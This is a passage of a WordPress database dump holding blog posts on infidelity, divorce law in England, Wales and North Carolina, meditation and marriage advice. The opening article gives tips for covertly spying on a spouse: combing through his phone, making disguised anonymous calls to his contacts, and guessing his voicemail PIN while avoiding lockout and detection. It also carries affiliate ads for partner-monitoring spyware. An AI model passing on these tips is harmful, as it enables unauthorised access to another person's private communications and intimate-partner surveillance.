could call each other when we were done.</p>\n<p>As I was strolling along I saw my husband standing at the end of an aisle on his cell phone. He was laughing and appeared to be somewhat blushing. I instantly called his cell phone and asked if he was about done. He replied he was and that he would meet me at the registers in a bit. I hung up and watched as he dialed a number and resumed his conversation.</p>\n<p>I had a very uneasy feeling but I didn’t know what to think. I felt like a stalker that night hiding behind clothes racks and shelves spying on him.</p>\n<p>Later that night while we were having dinner I asked him if ‘we’ were okay and he assured me we were. I still didn’t feel quite right so I just asked that dreaded question, “Are you cheating on me?” It’s not what he said that pierced my heart it was his nervous fidgeting while denying the accusation.</p>\n<p>An eighteen-wheeler couldn’t have smacked me as hard as reality did at that very moment. I was angry, shocked and very hurt. My life went from comfortable and somewhat organized to a complete void.</p>\n<p>I felt like I had hit bottom in the darkest of tunnels without even taking the ride. But wait! I’ve been married over a decade. I had taken a ride, but I guess I missed all of the road signs that told me I was heading for the end.</p>\n<p>I could have taken my husband’s word that we were fine, but my gut instinct told me different. The very thought of living a lie and those little voices in my head began eating away at me. I had to know the truth.</p>\n<p>I began with his cell phone bill. We didn’t receive itemized bills in the mail and I never really thought about it. I just assumed we were saving a buck or two every month, but I soon discovered that I could view his cell phone bill online since we had a joint account. It wasn’t difficult to set up and I was able to view previous bills.</p>\n<p>I printed out every bill I could and highlighted frequently called numbers. I then visited a few web sites that offered free reverse phone number searches and started putting names to the numbers. I couldn’t do that with cell phone numbers so I stooped to the level of “Mrs. Anonymous”.</p>\n<p>I called several of his friends and co-workers blocking my home phone number while trying to disguise my voice with a low, “I’m sorry. I’ve got the wrong number”. At first I felt rotten but with each new discovery it added fuel to my own little investigation. Soon I was playing the part like a pro.</p>\n<p>I was making anonymous phone calls, jotting down notes, and crying my eyes out at the same time. I eventually found the other woman’s home phone number and her cell phone number.</p>\n<p>His cell phone bill also showed an extremely heavy volume of text messages, which I could not check. All I knew was the number sent and received. I called our cell phone service provider and was told that text messages could not be itemized. Great! I would have thought modern technology would be on my side, but it wasn’t. Text messages proved to be the biggest secret weapon in his marital misconduct.</p>\n<p>I learned quite a bit during my lonely and bitter period of self-pity. I won’t bore anyone or fuel the gossip line with juicy details, but I will share a few tips I discovered during my heartbreaking experience.</p>\n<p>Analyzed cell phone bills to create a timeline. The frequency and volume of calls during a specific time of day can show when your spouse has more time on their hands than you know. Good tip is to call during this time frame. Also look for a period during the day where there is a large time span between phone calls.</p>\n<p>The first call after this dead time maybe the call after the ‘meeting’.</p>\n<blockquote class=\"right\"><p>“I  am currently a deployed soldier. My intentions with this program was to  make sure my wife wasn’t cheating on me. I have come to find out,she is”<a rel=\"external nofollow\" href=\"../go/acespy/\">AceSpy</a></p></blockquote>\n<p>If you get a chance pilfer through your spouse’s cell phone. You can learn so much by doing so. Check incoming and outgoing calls. Don’t forget the missed calls. Also check text messages sent, received and saved. If you find that calls or text messages have been deleted don’t fret.</p>\n<p>There are other things you can check. Check Canned Messages or similar pre-made messages that can be created on a cell phone and save so that words do not have to be keyed in when sending a text message. Lazy, but it’s easy. Don’t forget to check the phone book.</p>\n<p>One of the coolest functions I found during my plight is Voice Memos. Several mobile phones have this function and I found numerous saved voice memos on my husband’s phone and my own phone. I’m assuming these were saved on my own phone while I was trying to adjust the volume during different conversations and hit the memo button by accident.</p>\n<p>The mobile phones we have only record the other party’s conversation but that was enough for my marital misconduct argument with my husband.</p>\n<p>Another thing that I did was figure out my husband’s password to his voice mail. Evil I know, but I couldn’t help myself. I figured that after living with this man for over a decade I could crack his code. I was successful but it definitely took time. I waited until he was home and his cell phone was turned off.</p>\n<p>During each call to his voice mail I would only attempt access two times. I was afraid a third attempt would block his access to his voice mail and he would have to call customer service, which would unveil my sneaky side. If you do go this route and crack the code remember that when you listen to a message it will no longer be an unheard message.</p>\n<p>So you have a major dilemma, delete the message or let your spouse hear a recording that says something to the effect of you have one old message. That is a very difficult decision. You are either going to have to delete important messages or risk the chance of being discovered. Whether your spouse suspects you or not, I guarantee the password will change very quickly.</p>\n<p>Also, don’t forget to dial a different number afterwards if your phone has redial that shows the number you called. You don’t want your spouse to see their cell phone number and password on the screen. Which brings me to another tip. It definitely pays off to hit redial on your home phone from time to time.</p>\n<p>Caller ID’s are a wonderful tool. Of course they can be deleted, but how many Caller ID’s do you have in the house? Check all of them. I found that my satellite television had Caller ID because it was plugged into a phone jack. Fantastic tool.</p>\n<blockquote class=\"right\"><p>As seen on CHEATERS</p>\n<p>You’ve seen the TV Show. When the show ends, it asks its viewers to visit their website. And what software do you see them promoting? That’s right, <a rel=\"external nofollow\" href=\"../go/pcpandora/\">PC Pandora!</a></p></blockquote>\n<p>You have to appreciate modern technology. Not only does it make our lives easier but it also makes marital misconduct easier. Pre-paid mobile phones. How clever. Who would have thought? No bills, no nothing. The perfect tool for concealing those ‘special calls.’ Watch for mailings from different cell phone companies other than your current provider that offer incentives to Preferred Customers. NOTE:</p>\n<p>Some companies do send out mass mailings in hopes of gaining new customers and these companies will use different ploys to attract new customers. So if you do receive something from a different cell phone provider call the company first and inquire on their mailing before jumping to conclusions.</p>\n<p>Hang-up calls or anonymous calls to your home number maybe something you need to pay attention to. Don’t jump to conclusions again, but pay attention. You can block anonymous calls to your home. Most local phone services providers offer this option and you can call them and inquire about this feature.</p>\n<p>Most of the time it’s done by entering a code on your home phone and can be undone by entering a different sequence using your keypad on your phone.</p>\n<p>Everything I have mentioned takes time. I did not accomplish everything in a day or two; it actually took months for me to catch on and make my discoveries. I would not have put myself in harms way if I feared my spouse and I do not recommend anyone doing anything that would put you in danger or risk of being physically hurt. Seek help.</p>\n<p>Modern technology is awesome. It makes our lives easier and more interesting. It’s a shame that it tempts us to be unfaithful, but it’s so easy and convenient. It also appears to be fun and intriguing.</p>\n<p>What can we do? Destroy the cell phone?</p>\n<p>mobile phones have become an important part of our lives and many of us feel so lost if we don’t have a cell phone attached to our hip or in our purses. Don’t blame the cell phone.</p>\n<p>Take a look at your relationship and be honest with yourself. Where did it go wrong? It didn’t happen overnight. A quick fix isn’t going to help a relationship that took months or years to fall apart.</p>\n<p>No matter what you do just remember there is no easy way to get through the devastation of marital misconduct, but with time things will get easier. The trust you had has been destroyed and whether you are headed for divorce or trying to work things out, it all takes time.</p>\n<p>It’s so easy to let a marriage fall into a rut and become routine. When that happens it’s easy to take advantage of each other and lose the respect that once was there. To make a marriage work both spouses have to make sacrifices and spend quality time together instead of just existing together. Communication is so important. Not just the casual conversations about how the day went, but really talk and listen to each other.</p>\n<p>And, if you decide to try to  after discovering marital misconduct I sincerely hope that you and your spouse find that special feeling again, and that’s love.</p>\n<p> </p></div>\n			</div>\n		</div>','Are mobile phones to blame for marriage problems?','Remember that day so long ago when you said, \"I do\". There was no doubt in your mind at that very moment that you were in for the long haul and never thoug','inherit','closed','closed','','41-revision-v1','','','2017-10-04 10:12:45','2017-10-04 10:12:45','',41,'http://www.bournesociety.org.uk/41-revision-v1',0,'revision','',0),(283,1,'2017-10-04 10:13:21','2017-10-04 10:13:21','<div id=\"content\" class=\"hfeed\">	\n		\n		\n	<div class=\"post-5 post type-post status-publish format-standard hentry category-divorce tag-citizens-advice-bureau tag-divorce tag-principal-registry tag-relationship tag-wales\">\n	\n				<h1 class=\"entry-title\">A Guide to Divorce in England and Wales</h1>\n\n		<div class=\"byline-meta\"/>		\n				<div class=\"entry-content\">\n		<p>Not all marriages live happily ever after and there comes a time when divorce becomes inevitable. Many people are unsure of how to go about getting a divorce in England and Wales and this guide will give you an idea of what you have to do.<span id=\"more-5\"/></p>\n<h3>What steps must I take now that I have finally decided to get a divorce?</h3>\n<p>To get a divorce in England and Wales you must fill in a form called a ‘petition’, which you then take to any divorce county court. If you live in London, you can take it to the Principal Registry.</p>\n<h3>How long must I have been married before I can get a divorce?</h3>\n<p>To get a divorce you must have been married for more than one year.</p>\n<h3>What reasons do I need to get a divorce?</h3>\n<p>You must prove to the court that you have good <a href=\"http://www.advicenow.org.uk/advicenow-guides/family/divorce-a-survival-toolkit/grounds-for-divorce-html,679,FP.html\" target=\"_blank\">grounds for wanting a divorce</a> and they will accept at least one of the following reasons:</p>\n<h3>You have proof that your spouse has committed adultery and you find it intolerable to live with him/her.</h3>\n<p>Adultery means that your spouse has had a sexual relationship with a third party of the opposite sex. If the sexual relationship was with someone of the same sex then that is not regarded as adultery but <a href=\"http://www.justdivorce.co.uk/unreasonable-behaviour\" target=\"_blank\">unreasonable behaviour</a>. You must file for divorce within six months of discovering the adultery unless you stopped living together after discovering it.</p>\n<p>It will have no bearing on the court’s decisions concerning children, assets or any other judgements which one of you committed adultery.</p>\n<h3>Your spouse’s behaviour has been so unreasonable that you cannot bear to live with them any longer.</h3>\n<p>In the last few years, a large proportion of divorces in the UK have been granted due to ‘unreasonable behaviour’ and because these types of divorces are usually granted quite quickly, they have become a popular way for couples to get divorced.</p>\n<p>You must <a href=\"http://www.direct.gov.uk/en/Governmentcitizensandrights/Divorceseparationandrelationshipbreakdown/Endingamarriageorcivilpartnership/Gettingadivorce/DG_193735\" target=\"_blank\">file for divorce</a> on these grounds within six months of the incident of intolerable behaviour occurring which is quite reasonable if you think about it, after all it is not fair to use this reason for something, which may have happened a long time ago and hasn’t happened since.</p>\n<h3>Your spouse deserted you at least two years ago.</h3>\n<p>It is sometimes difficult to prove that a spouse deliberately deserted their partner and not simply away for legitimate reasons and could not contact them.</p>\n<h3>You and your spouse have lived apart for at least two years and that he or she agrees to a divorce.</h3>\n<p>If both of you can prove that you have lived apart for at least two years and that you want an amicable divorce then one of you can file for divorce.</p>\n<h3>You and your spouse have lived apart continuously for at least five years.</h3>\n<p>If the continuous separation of five years can be proven, then consent is not necessary from the other partner.</p>\n<h3>Must I live in England or Wales to get a divorce here?</h3>\n<ul><li>You and your husband or wife, must both have your permanent homes in England or Wales when the petition is started; or</li>\n<li>You and your husband or wife must both be living in England or Wales when the petition is started; or</li>\n<li>You and your husband or wife must both have had your last home in England or Wales and one of you must still be living in either of these countries when the petition is started; or</li>\n<li>Your husband or wife must be living in England or Wales when the petition is started; or</li>\n<li>You must have been living in England or Wales for at least a year on the day the petition is started; or</li>\n<li>You must have your permanent home in England or Wales and have been living in either of these countries for at least six months on the day the petition is started.</li>\n</ul><p>You may also get a divorce in England and Wales in other specific circumstances. You should contact a solicitor, law centre or Citizens Advice Bureau if you need help deciding which statement applies to you.</p>\n<h3>Do I really need a divorce lawyer?</h3>\n<p>In simple divorce cases where both partners can come to an amicable agreement then you may not need the services of a divorce lawyer but as many divorces have complicated situations to deal with such as financial support, child custody, property etc., then it is advisable to seek the advice of a <a href=\"http://www.brookman.co.uk/legal-advice/finding-a-solicitor\" target=\"_blank\">good divorce lawyer</a> at the outset.<!-- End Catalyst Footer Scripts -->  </p>\n			  </div>\n	</div>\n			      </div>','Divorcing in England & Wales','Not all marriages live happily ever after and there comes a time when divorce becomes inevitable. Many people are unsure of how to go about getting a divor','inherit','closed','closed','','37-revision-v1','','','2017-10-04 10:13:21','2017-10-04 10:13:21','',37,'http://www.bournesociety.org.uk/37-revision-v1',0,'revision','',0),(284,1,'2017-10-04 10:13:37','2017-10-04 10:13:37','<div id=\"content\" class=\"hfeed\">	\n		\n		\n	<div class=\"post-64 post type-post status-publish format-standard hentry category-self-help tag-depression tag-relationship\">\n	\n				<h1 class=\"entry-title\">A Peaceful Place In The Storm – How To Stay Calm When Life Isn’t</h1>\n\n		<div class=\"byline-meta\"/>		\n				<div class=\"entry-content\">\n		<p> </p>\n<p>No matter what is happening in the world around us, it is never necessary to become stuck in depression, fear or other negativity. We are not the victims of the world we see, but have the ability to mobilize ourselves and create a positive, life giving response. There are simple steps to take and truths to know, which when absorbed and practiced easily turn our state of mind around – and can effect the world outside as well.<span id=\"more-64\"/></p>\n<p>Depression and fear can easily become addictive. The longer we stay in those states of mind, the more difficult it can become to leave them. Our world grows smaller, our focus constricts, and we begin to develop catastrophic expectations which seem inevitable. In this process we lose touch with the power of our own true nature to choose, decide, renew, and to take actions which counteract the negativity that has been presented to us. In fact, it is the responsibility of every mature adult, to take the reins of his/her life back in her hands and steer it in the direction of her own choosing. This takes courage and practice, but with the tools of Centering it is easy to do. The more we do it, the stronger we grow, and the more we can see negativity for what it is, a shadow of our real selves, with no intrinsic power of its own, other than that which we give it.</p>\n<h3>Centering</h3>\n<p>The practice of Centering is ancient and has many forms and components. All exercise, martial arts and forms of meditation and prayer are ways to achieve centering and balance in the truth of who we are. They are ways of tapping into the fundamental strength and wisdom all individuals are endowed with. In Zen they say, “Open the treasure house within.” This reminds us that we are endowed with gifts which are far greater than we currently realize or employ. When we integrate Centering with psychological practice, we develop an entirely different way of working with the pain, confusion and difficult relationships that most individuals find themselves in. In this article, two Centering practices will be offered. While both are simple, they are very powerful. When either of them is taken on and practiced daily, changes will soon be seen.</p>\n<h3>Attention</h3>\n<p>We are what we think about. Morita, a Japanese psychiatrist, the founder of Morita Therapy, states that all neurosis comes from frozen attention that has gotten stuck and fixed upon recurring negative thoughts. In the West we call this obsession. In the world of Zen, this condition is described as being in the grip of one’s ego, pre-occupied by self centered thoughts. The more we give attention to that which is destructive, the more strength it has to rule our lives. This can be counteracted rather easily.</p>\n<h3>Take back your attention.</h3>\n<p>Do not let it be absorbed by all that is presented to it. The power of focus is the power of life. Spend time each day developing focus and concentration. This is also called meditation. Withdraw yourself from the chaotic external world for a period of time each day, and pull your attention back within. Sit with a straight back, do not move and concentrate upon your breath. Let random thoughts come and go. Do not suppress them, but do not let them grab your attention away. (At first you may be besieged by many surprising thoughts and feelings, but if you simply notice them and then return your attention to your breathing, these will soon die down).</p>\n<p>Count your breath from one to ten, then all over again. Do this for at least ten to fifteen minutes without moving. By not moving we are stopping what is called the monkey mind, the mind which jumps from one thing to the next, fears, demands, grabs and sabotages our lives. It is the monkey mind which causes our sorrow and fear. But it is only a part of us, it cannot take over our lives, when we take our attention back. By doing this daily, we are strengthening new parts of ourselves which can guide and lead us in a new direction, one of meaning, and well being.</p>\n<p>When concentration grows, do this practice for a little longer. Soon we will not be able to be without this time in the silence. From the silence comes all kinds of treasures, including healing of our minds and hearts.</p>\n<p>This wonderful time spent with oneself is a simple way to attain perspective, become able to see clearly and be planted in the larger truth. We do not become so carried away by momentary problems or feel as vulnerable anymore. This time becomes a fortification against many storms which naturally besiege us. We develop a place within ourelves to which we can always return, for wisdom, strength and comfort. When we allow the external world to consume us, we are simply giving our natural treasures away.</p>\n<p>Centering is different than conventional models of treating psychological problems. Here we focus upon the strengths, not the weaknesses. We find the health of the individual and encourage that to grow. Little by little the illness and fear is no longer needed and drops away by itself. This model by-passes the illusions that grip us. It gives them no credence at all. Rather than struggle to analyze and undo our patterns, we work directly with our attention. The question before us always is: What am I focussing on this moment? Am I present to the breathing, or lost somewhere in a dream, dwelling upon the pains and wrongs I think have others have done me, or the terrible things that can happen someday?</p>\n<p>Reality continually renews and confronts us with new tasks, challenges, opportunities and solutions, day after day. Are we in touch with this ever flowing reality? Are we asking ourselves what is available now, what gifts we are receiving and what we can give to others, or are we dwelling upon how wronged, threatened or deprived we’ve always been? By taking our attention off our toxic inner dialogue, and focusing upon what is before us, right now, we directly interfere with the habitual patterns that are the primary cause of our suffering.</p>\n<p>As we do this faithfully, the second step of Centering appears. At a certain moment we become aware that depression and gratitude, or the willingness to be of service, cannot co-exist in the same person at the same time. When we are totally absorbed with our own safety, security or well being, our natural life force and ability to live fulfilling lives becomes blocked When our focus and life are primarily self absorbed, revolving around self centered dreams, what we are needing and what others are thinking of us, we live in a prison without bars. Any insult, real or imagined, can become the cause of great pain, resulting in withdrawal and retreat into fantasies. Underlying feelings of worthlessness emerge, producing additional depression, hostility and stress.</p>\n<p>In Centering we change our focus to all that we are receiving, what others need, what we can give, what has to be done, moment by moment, person by person. And then we do it. We take action. We do not hesitate. When our focus is put upon simple daily actions, and upon doing “deeds of service,” the monkey mind is dismantled and passing emotions do not take center stage.</p>\n<p>As we Center we learn to do each action with full attention, (no matter how small or large). We do not dwell upon the outcome. Our joy and satisfaction comes from acting with a whole heart and mind. Results and consequences are secondary, and take care of themselves. When we are not absorbed by concern for outcomes, how much anxiety can we ever have?</p>\n<p>The medicine Centering offers is simple and direct. It has no negative side effects and the more one takes it the sweeter it tastes. As we learn to do each task wholeheartedly, we then naturally evolve into doing “deeds of worth”.</p>\n<p>The most powerful antidote to psychological suffering is an individual’s sense of self worth. This does not come about through artificially boosting self esteem, but as a result of living a life worthy of respect. Each individual must make a personal alignment between their daily actions and their highest values. In this way, each one learns to build a life that ennobles them, and is of natural service to others as well.</p>\n<p>As we become more and more available to the present moment, we become occupied with that which is valuable, and life giving. Not only does our resourcefulness increase, but our responses become fitting and appropriate to whatever it is that is needed. In this manner we can best handle any difficult situation and give what is needed to all. Not only does life feel like a gift we are constantly receiving, but we become a gift to life as well.</p>\n<p> </p>\n			  </div>\n	</div>\n			      </div>','How can you stay calm when your marriage is falling apart?','No matter what is happening in the world around us, it is never necessary to become stuck in depression, fear or other negativity. We are not the victi','inherit','closed','closed','','39-revision-v1','','','2017-10-04 10:13:37','2017-10-04 10:13:37','',39,'http://www.bournesociety.org.uk/39-revision-v1',0,'revision','',0),(285,1,'2017-10-04 10:14:25','2017-10-04 10:14:25','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1403 post type-post status-publish format-standard hentry category-marriage tag-communication tag-help tag-keep-your-marriage tag-make tag-marital-problems tag-marriage-advice tag-marriage-relationship tag-relationship post_box top\" id=\"post-1403\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">A Healthy, Happy Marriage Takes Work				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<p><span class=\"drop_cap\">W</span>hile you undoubtedly learned many useful things in school, how to create a happy marital relationship probably wasn’t included. Most spouses learn about marriage through the proverbial “School of Hard Knocks.”</p>\n<p>As a student, you undergo drills to help you learn your multiplication tables, you’re tested on your mastery of geography and science, and you memorize spelling words. As you progress, you learn to write term papers and to analyze symbolism in literature.</p>\n<p>But you were probably not taught one of the most important skills you could learn: how to create, nurture, and sustain a healthy, satisfying relationship with good communication and intimacy. And, sad to say, some people never learn this skill even after multiple marriages.<span id=\"more-1403\"></span></p>\n<p>There are many misconceptions about marriage and the impact of two individuals saying “I do.” Much emphasis is devoted to planning the perfect wedding-more than is usually devoted to becoming the best partner possible. Often, the marriage is regarded as something that will fall into place with minimum effort after the ceremony.</p>\n<p>Which of the following ten points about marriage were you surprised to learn after you said “I do”?</p>\n<p>1. Creating a healthy, happy marriage takes hard work.It doesn’t just happen on its own.</p>\n<p>Numerous spouses are surprised by the amount of work it takes to keep a marriage on course. Some believe that if you really love someone, the relationship shouldn’t be work, it should just flow easily. That sounds good, but in reality all meaningful relationships require an on-going investment of time, effort, energy, and commitment.</p>\n<p>2. You don’t get to coast for very long. It seems that when things are going well, you should get to “take a break” from the relationship stuff for awhile.</p>\n<p>But if you’re not growing and evolving as individuals and as a couple, then your relationship is soon going to suffer. There’s no such thing as standing still and having everything stay the same. You’re either going forwards or you’re going backwards.</p>\n<p>3. Saying “I do” is not the end-it’s the beginning. Some spouses feel that once they are married, they don’t have to extend as much effort into being romantic or nurturing the relationship.</p>\n<p>But a marital relationship isn’t the end of the road. It’s only the beginning of your opportunity to “grow your marriage” and create a rewarding relationship with your partner.</p>\n<p>4. You’re not going to change your partner after you marry. No matter how many times this statement is written or verbalized, there are many individuals who still believe that their case will be different.</p>\n<p>Motivation to change is normally the highest before marriage when both partners want to please each other. After marriage, it’s easier to become comfortable and lose motivation to work on self-growth.</p>\n<p>Females are especially susceptible to this dynamic. Because they often are hooked by the potential that they see in their partner, they’re convinced that they can change him. This usually leads to a rude awakening after marriage.</p>\n<p>5. You can’t give what you don’t already have. You have to be happy and at peace with yourself before you can create a happy, peaceful,harmonious marriage.</p>\n<p>Marriage won’t make you happy. Only you can do that. If you’re not happy with yourself and your life when you get married, nothing will change significantly afterwards.</p>\n<p>6. Frequent emotional housekeeping is required for intimacy to thrive. It doesn’t take long for a marriage to develop serious problems when emotional debris from unresolved conflicts and issues piles up.</p>\n<p>This is why good communication is important. Couples who can’t talk about their differences and resolve conflict are at high risk for divorce. Feelings of passion, emotional intimacy, and heartfelt connection are all dependent on<br />\ngood communication.</p>\n<p>7. The words you say are important, so pick them carefully. You can’t expect the spouse you called a “witch” or “fool” at 8:00 p.m. to be thrilled at the thought of sex with you at 9:00 p.m.</p>\n<p>By the words you use in your interactions with your partner, you impact how your spouse feels about you. Harsh, unkind words fuel anger, resentment, and bitterness. Kind words build rapport, respect, and caring.</p>\n<p>The words you use to yourself and others when talking about your spouse and your marriage are also important. When you devalue someone or something verbally, it affects your feelings and perceptions. Negativity spreads like a virus.</p>\n<p>8. Just because you dislike your partner intensely at the moment doesn’t mean that you don’t love him or her. It’s normal to have mixed feelings toward your spouse at times.</p>\n<p>Sometimes your inner two-year-old will appear in your reactions-you know, the one who could stomp his feet and scream “I hate you, Mommy!” when he didn’t get his own way. There are times when spouses can’t stand each other and the feelings of closeness and connection lessen. But that doesn’t mean that the marriage is over or that the love is permanently gone.</p>\n<p>9. Success in marriage, as in life, is an inside job. The breakthroughs happen when you take responsibility for your actions and attitudes and focus on what changes you can make to improve the relationship.</p>\n<p>It’s important to learn how to stay centered and balanced emotionally as much as possible, and that requires inner work on yourself. Learning to be more self-aware will help you better understand your part in creating the present<br />\nsituation.</p>\n<p>10. There’s no end to growth. There’s always something else to experience and learn. You can always improve your relationship skills and grow more as a person.</p>\n<p>Unlike school where you eventually get a diploma if you meet the requirements, you never “graduate” from relationship school. Just when you think you’ve learned to keep your equilibrium in your relationship, something is sure to throw you off balance as if to test you. That’s why you need to keep working on your marriage at all times.</p>\n<p class=\"alert\"> </p></div>\n			</div>\n		</div>','A happy and healthy relationship takes work and committment','While you undoubtedly learned many useful things in school, how to create a happy marital relationship probably wasn\'t included. Most spouses learn about m','inherit','closed','closed','','38-revision-v1','','','2017-10-04 10:14:25','2017-10-04 10:14:25','',38,'http://www.bournesociety.org.uk/38-revision-v1',0,'revision','',0),(286,1,'2017-10-04 10:14:50','2017-10-04 10:14:50','<div id=\"content\" class=\"hfeed\">	\n		\n		\n	<div class=\"post-44 post type-post status-publish format-standard hentry category-divorce tag-child-tax-credit tag-divorce tag-social-security\">\n	\n				<h1 class=\"entry-title\">69 VERY Big Divorce Mistakes You Do NOT Have To Make</h1>\n\n		<div class=\"byline-meta\"/>		\n				<div class=\"entry-content\">\n		<p> </p>\n<p>There are so many mistakes you do NOT want to make if your divorce is just beginning or if it is in process. I’ve listed the 69 biggest reasons I could come up with. (All pronouns are used interchangeably.) First, I do not want anyone to think I am condoning being unfair to your spouse. The things each of you had before your marriage should stay with that person. The other things, tangible items, should be split as equally as possible between each of you.<span id=\"more-44\"/></p>\n<p>1. Giving up control of your divorce – this is NOT your lawyer’s divorce</p>\n<p>2. Not keeping records of everything (i.e., when you pick up the kids, when you drop them off, when your ex calls, what she wants when she does call – and if it’s just to ‘see how you’re doing’ or to interrupt everything you and the kids are doing, put a stop to it immediately), etc.</p>\n<p>3 Dividing up property without a thorough inventory – must have a complete list of what you own and what you owe ~ a 50 – 50 division of property is NOT the same thing as a fair division of property</p>\n<p>4. Keeping the house even if you can’t afford it ~ let your ex have the headache or sell it</p>\n<p>5. Not asking your ex to guarantee child support payments (if he is ordered to pay) with life insurance</p>\n<p>6. Not seeking financial advice from someone other than your attorney or friends</p>\n<p>7. Not setting up a specific parenting schedule ~ do not agree to liberal and frequent visitation (what works in the beginning will likely not work later on)</p>\n<p>8. Not making sure there is a provision for your access to or sharing of medical and school records</p>\n<p>9. Not adding a provision for discussion prior to your ex moving away with the kid(s)</p>\n<p>10. Spending too much time and money letting lawyers gather information – see the mykidstoo? article ‘Find the Money’ 11. If it is close to 10 years, not waiting until that 10 year mark ~ it could be a difference in collecting against your ex’s Social Security benefits (of course, if your ex doesn’t have any Social Security benefits, this is a moot point ~ this also works in reverse with your ex collecting against your Social Security benefits)</p><div style=\"clear:both;\"/>\n<p class=\"pages\"> </p>\n			  </div>\n	</div>\n			      </div>','69 of the worst Divorce Mistakes that you shouldn\'t make','There are so many mistakes you do NOT want to make if your divorce is just beginning or if it is in process. I\'ve listed the 69 biggest reasons I could','inherit','closed','closed','','35-revision-v1','','','2017-10-04 10:14:50','2017-10-04 10:14:50','',35,'http://www.bournesociety.org.uk/35-revision-v1',0,'revision','',0),(287,1,'2017-10-04 10:15:10','2017-10-04 10:15:10','<div id=\"content\" class=\"hfeed\">	\n		\n		\n	<div class=\"post-43 post type-post status-publish format-standard hentry category-divorce tag-marriage-counselor\">\n	\n				<h1 class=\"entry-title\">5 Things To Do Before You Even Think About Getting A Divorce</h1>\n\n		<div class=\"byline-meta\"/>		\n				<div class=\"entry-content\">\n		<p>There are many steps to take before you can start to think about <span style=\"text-decoration: underline;\">getting a divorce</span>. This article will get you started. Your best bet is to talk to a lawyer before you do anything about getting a divorce, to protect yourself.<span id=\"more-43\"/></p>\n<h3>1. Talk to a Marriage Counselor or other professional who may be able to help you .</h3>\n<p>Even if you don’t think there’s hope for the marriage, divorce counseling can help you discover what went wrong, how to cope, and how to pick up the pieces and go on. Don’t wait for your spouse to participate. If you don’t know how to find a qualified counselor, our firm will be glad to recommend one or you can check out the directory of professionals at stayhappilymarried.com. Your employment, social or religious contacts might also provide leads.</p>\n<h3>2. Talk to an attorney before you do anything.</h3>\n<p>Even if you don’t end up hiring an attorney to handle your separation or divorce, you would be well advised to get as much information as you can before you even discuss divorce with your spouse. There’s a lot to know about divorce in North Carolina our laws are complex and even the simplest situation can be very confusing to families already in distress. Actions you take now may very well affect the outcome of your divorce (see #3) and you need to understand your options ahead of timenot some time down the road when it may be too late to alter the outcome. Click here to find attorneys who are well versed in the intricacies of North Carolina divorce law.</p>\n<h3><a href=\"../go/divorcedefense/\" rel=\"nofollow\" target=\"_blank\"><em><strong>Women: Getting A Divorce? You Might Want To Read This…</strong></em></a></h3>\n<h3>3. Do not move out of the marital home without talking to an attorney first.</h3>\n<p>Leaving the house without a good reason may cause you to pay alimony or may result in your inability to collect alimony. If you leave the house, you may also be unable to return until after a court divides the property. This process might take more than a year. The best advice is to stay in the house until after you talk with an attorney unless your spouse is violent. If your spouse is violent, you must take all steps necessary to protect yourself and your children.</p>\n<h3>4. If you have been involved in any extramarital affairs, talk to a lawyer before you discuss this with your spouse or anyone else.</h3>\n<p>In this case, honesty may not be the best policy. In addition to the fact that adultery is illegal in some states, admission of an affair can have other dire consequences. If your spouse is a candidate for alimony, any illicit sexual behavior on your part (during the marriage which includes the time you are separated) could end up costing you thousands in additional alimony payments.</p>\n<h3>5. Take concrete steps to safeguard your assets before you and your spouse begin discussing divorce.</h3>\n<p>One of these steps is to take possession of certain assets during separation, especially those assets you wish to be using, such as furniture and vehicles, and those assets that might be liquidated by your spouse, including precious gems and stones, other collectibles, cash, and bearer bonds.</p>\n<p>Another self-protective step is to file what is known as a Lis Pendens in the Deeds Office of any county where you and/or your spouse own real property. The lis pendens puts third parties on notice of your claim to have an interest in the real estate against which the lis pendens is docketed. The lis pendens is basically a notice of pending litigation that may affect real property. A properly recorded and served lis pendens clouds the title to the property, preventing an effective sale of the property behind your back. The rules regarding a lis pendens contain very specific requirements, all of which are spelled out in section 1-116 and the following sections of the North Carolina General Statutes.</p>\n<p>A third possible step to protect the assets of your marriage is to get an injunction restraining your spouse from transferring or otherwise disposing of any property covered by the restraining order. Your attorney can also use an injunction to get your separate property returned to you, where your separate property is in the possession of your spouse and the spouse refuses to give it to you. The equitable distribution statute also provides a means for you to obtain an interim distribution of marital property, pending a final resolution of the property matter. Such an interim allocation could, for instance, give you much needed funds on which to live.</p>\n<p>Other protective measures you might consider in your divorce planning include: (1) protecting your own credit rating by freezing or closing joint cards and by blocking your spouse’s access to other joint credit such as a home equity loan; (2) closing joint bank accounts and opening accounts in your own, individual name; (3) changing the name of the responsible party on utility and other bills; and (4) spending where possible your spouse’s separate property first, marital property next, and your own separate property last.</p>\n<p>While this list will help you get started on the right track, it is by no means a complete list of all the things you need to do and know if you are considering a divorce. For more information about the rights and duties of separating and divorcing husbands and wives visit http://www.rosen.com. You’ll find a complete law library, downloadable divorce forms, a legal fee calculator, a child support calculator, lists of professionals who can help you and stories from people just like you who have survived divorce.</p>\n<p>Lee S. Rosen is a Board Certified Family Law Specialist and founder of Rosen Divorce in North Carolina. Rosen Divorce is the largest divorce firm in the Southeastern United States. For more information visit <a href=\"http://www.rosen.com/\" rel=\"nofollow\" target=\"_new\">http://www.rosen.com.</a></p>\n<h3><a href=\"/\" target=\"_blank\"><em><strong>Men: If You Are Getting A Divorce,You Might Want To Read This…</strong></em></a>			  </h3>\n			  </div>\n	</div>\n			      </div>','5 things to think about when getting a divorce','Thinking about getting a divorce? There are many steps to take before you can start to think about getting a divorce. This article will help you...','inherit','closed','closed','','34-revision-v1','','','2017-10-04 10:15:10','2017-10-04 10:15:10','',34,'http://www.bournesociety.org.uk/34-revision-v1',0,'revision','',0),(289,1,'2017-10-04 10:23:32','2017-10-04 10:23:32','','3 Keys To Transform Your Marriage –','','publish','closed','closed','','3-keys-to-transform-your-marriage','','','2017-10-04 10:23:32','2017-10-04 10:23:32','',0,'http://www.bournesociety.org.uk/?p=289',1,'nav_menu_item','',0),(290,1,'2017-10-04 10:23:32','2017-10-04 10:23:32',' ','','','publish','closed','closed','','290','','','2017-10-04 10:23:32','2017-10-04 10:23:32','',0,'http://www.bournesociety.org.uk/?p=290',2,'nav_menu_item','',0),(291,1,'2017-10-04 10:23:32','2017-10-04 10:23:32',' ','','','publish','closed','closed','','291','','','2017-10-04 10:23:32','2017-10-04 10:23:32','',0,'http://www.bournesociety.org.uk/?p=291',3,'nav_menu_item','',0),(292,1,'2017-10-04 